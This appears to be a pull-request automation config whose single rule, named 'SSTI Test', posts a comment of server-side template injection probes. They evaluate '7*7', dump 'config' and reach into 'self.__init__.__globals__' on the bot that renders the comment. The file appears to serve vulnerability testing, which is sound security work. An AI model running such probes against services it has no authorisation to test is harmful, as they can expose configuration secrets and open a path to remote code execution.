pull_request_rules:
  - name: "SSTI Test"
    conditions:
      - base=main
    actions:
      comment:
        message: |
          Test 1: {{ 7*7 }}
          Test 2: {{ config }}
          Test 3: {{ self.__init__.__globals__ }}
